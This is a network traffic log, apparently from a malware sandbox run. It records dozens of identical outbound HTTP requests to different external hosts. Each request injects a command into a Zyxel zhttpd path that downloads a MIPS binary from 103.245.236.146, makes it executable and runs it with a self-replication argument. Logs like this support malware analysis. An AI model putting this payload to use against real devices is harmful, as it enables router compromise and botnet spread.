                                                  Jan 19, 2024 18:23:11.593578100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  370192.168.2.134876039.60.77.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:11.593616962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  371192.168.2.1353384122.142.182.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:11.593647957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  372192.168.2.134745263.91.73.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:11.593658924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  373192.168.2.133723843.21.102.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:11.593698978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  374192.168.2.1344360138.101.199.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:11.593699932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  375192.168.2.133974475.176.155.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:11.593745947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  376192.168.2.134109259.251.160.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:11.593750954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  377192.168.2.1357076117.17.88.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:11.593789101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  378192.168.2.1358126172.119.164.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:11.593913078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  379192.168.2.1344022196.215.218.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:11.594028950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  380192.168.2.135398092.234.69.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:12.598133087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  381192.168.2.1351026173.30.18.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:12.598215103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  382192.168.2.1335326191.61.28.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:12.598239899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  383192.168.2.134913848.151.176.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:12.598299026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  384192.168.2.134944075.134.162.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:13.601500034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  385192.168.2.1355872195.245.29.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:13.601536989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  386192.168.2.134763847.253.78.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:14.606067896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  387192.168.2.1354722170.78.21.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:14.606190920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  388192.168.2.1355320198.234.115.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:15.609914064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  389192.168.2.1357032123.0.75.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:15.610014915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  390192.168.2.133838894.214.58.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:15.610047102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  391192.168.2.1335548207.88.234.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:15.610055923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  392192.168.2.1339284221.217.195.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:15.610119104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  393192.168.2.1342588179.79.232.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:16.614542007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  394192.168.2.1334680135.55.240.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:16.614594936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  395192.168.2.133999859.64.224.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:16.614636898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  396192.168.2.135689290.70.33.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:16.614741087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  397192.168.2.133407688.68.174.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:16.614797115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  398192.168.2.134343036.216.166.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:17.617733955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  399192.168.2.1344214135.94.208.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:17.617800951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  400192.168.2.1356318190.196.80.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:17.617868900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  401192.168.2.1344160135.142.178.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:17.617906094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  402192.168.2.1345978186.0.152.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:17.617960930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  403192.168.2.1341664167.211.37.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:17.617963076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  404192.168.2.1356822139.99.195.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:18.621654987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  405192.168.2.1347092177.122.123.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:18.621702909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  406192.168.2.1352770197.110.212.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:18.621725082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  407192.168.2.1350874110.64.149.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:18.621751070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  408192.168.2.1355632119.87.139.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:18.621789932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  409192.168.2.134080034.106.52.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:18.621855021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  410192.168.2.135784475.142.37.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:18.621970892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  411192.168.2.133442088.140.162.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:19.626266003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  412192.168.2.135768463.125.181.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:19.626305103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  413192.168.2.13485404.132.146.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:19.626373053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  414192.168.2.1347256208.206.128.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:19.626414061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  415192.168.2.135329836.156.180.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:19.626436949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  416192.168.2.134164499.26.163.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:20.631763935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  417192.168.2.1358318221.253.164.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:20.631824017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  418192.168.2.1333612100.231.106.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:20.631897926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  419192.168.2.1360756140.241.235.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:21.637141943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  420192.168.2.1342774149.212.0.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:21.637171030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  421192.168.2.1337714178.101.41.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:21.637217045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  422192.168.2.1343618174.220.43.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:21.637252092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  423192.168.2.1350218176.220.15.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:21.637306929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  424192.168.2.135589476.11.40.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:21.637346029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  425192.168.2.1353528120.73.22.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:21.637408972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  426192.168.2.134596890.77.212.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:21.637454987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  427192.168.2.133729444.61.232.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:21.637588978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  428192.168.2.1341676177.103.243.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:21.637617111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  429192.168.2.134360487.162.55.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:22.641545057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  430192.168.2.1344876145.192.23.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:22.641551971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  431192.168.2.1358032151.206.201.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:22.641566992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  432192.168.2.1359456161.55.186.206443
                                                  TimestampBytes transferredDirectionData
